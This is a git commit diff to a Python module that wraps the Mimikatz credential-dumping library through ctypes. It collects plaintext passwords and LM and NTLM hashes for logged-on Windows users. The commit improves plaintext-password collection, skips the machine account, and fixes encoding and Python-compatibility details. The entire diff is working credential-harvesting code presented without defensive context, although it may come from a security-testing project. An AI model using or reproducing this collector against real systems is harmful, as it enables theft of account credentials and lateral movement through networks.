Fix mimikatz bug where plain passwords weren't collected when they could have
This commit is contained in:
Itay Mizeretz
parent
48be73bc3f
commit
afcd066fff
|
|
@ -1,14 +1,13 @@
|
||||||
import ctypes
|
import ctypes
|
||||||
import binascii
|
import binascii
|
||||||
import logging
|
import logging
|
||||||
|
import socket
|
||||||
|
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
class MimikatzCollector:
|
class MimikatzCollector:
|
||||||
"""
|
"""
|
||||||
Password collection module for Windows using Mimikatz.
|
Password collection module for Windows using Mimikatz.
|
||||||
|
|
@ -24,7 +23,7 @@ class MimikatzCollector:
|
||||||
self._collect = collect_proto(("collect", self._dll))
|
self._collect = collect_proto(("collect", self._dll))
|
||||||
self._get = get_proto(("get", self._dll))
|
self._get = get_proto(("get", self._dll))
|
||||||
self._isInit = True
|
self._isInit = True
|
||||||
except StandardError as ex:
|
except StandardError:
|
||||||
LOG.exception("Error initializing mimikatz collector")
|
LOG.exception("Error initializing mimikatz collector")
|
||||||
|
|
||||||
def get_logon_info(self):
|
def get_logon_info(self):
|
||||||
|
|
@ -40,18 +39,28 @@ class MimikatzCollector:
|
||||||
entry_count = self._collect()
|
entry_count = self._collect()
|
||||||
|
|
||||||
logon_data_dictionary = {}
|
logon_data_dictionary = {}
|
||||||
|
hostname = socket.gethostname()
|
||||||
|
|
||||||
for i in range(entry_count):
|
for i in range(entry_count):
|
||||||
entry = self._get()
|
entry = self._get()
|
||||||
username = str(entry.username)
|
username = entry.username.encode('utf-8').strip()
|
||||||
password = str(entry.password)
|
|
||||||
|
password = entry.password.encode('utf-8').strip()
|
||||||
lm_hash = binascii.hexlify(bytearray(entry.lm_hash))
|
lm_hash = binascii.hexlify(bytearray(entry.lm_hash))
|
||||||
ntlm_hash = binascii.hexlify(bytearray(entry.ntlm_hash))
|
ntlm_hash = binascii.hexlify(bytearray(entry.ntlm_hash))
|
||||||
has_password = (0 != len(password))
|
|
||||||
|
if 0 == len(password):
|
||||||
|
has_password = False
|
||||||
|
elif (username[-1] == '$') and (hostname.lower() == username[0:-1]):
|
||||||
|
# Don't save the password of the host domain user (HOSTNAME$)
|
||||||
|
has_password = False
|
||||||
|
else:
|
||||||
|
has_password = True
|
||||||
|
|
||||||
has_lm = ("00000000000000000000000000000000" != lm_hash)
|
has_lm = ("00000000000000000000000000000000" != lm_hash)
|
||||||
has_ntlm = ("00000000000000000000000000000000" != ntlm_hash)
|
has_ntlm = ("00000000000000000000000000000000" != ntlm_hash)
|
||||||
|
|
||||||
if not logon_data_dictionary.has_key(username):
|
if username not in logon_data_dictionary:
|
||||||
logon_data_dictionary[username] = {}
|
logon_data_dictionary[username] = {}
|
||||||
if has_password:
|
if has_password:
|
||||||
logon_data_dictionary[username]["password"] = password
|
logon_data_dictionary[username]["password"] = password
|
||||||
|
|
@ -61,7 +70,7 @@ class MimikatzCollector:
|
||||||
logon_data_dictionary[username]["ntlm_hash"] = ntlm_hash
|
logon_data_dictionary[username]["ntlm_hash"] = ntlm_hash
|
||||||
|
|
||||||
return logon_data_dictionary
|
return logon_data_dictionary
|
||||||
except StandardError as ex:
|
except StandardError:
|
||||||
LOG.exception("Error getting logon info")
|
LOG.exception("Error getting logon info")
|
||||||
return {}
|
return {}
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue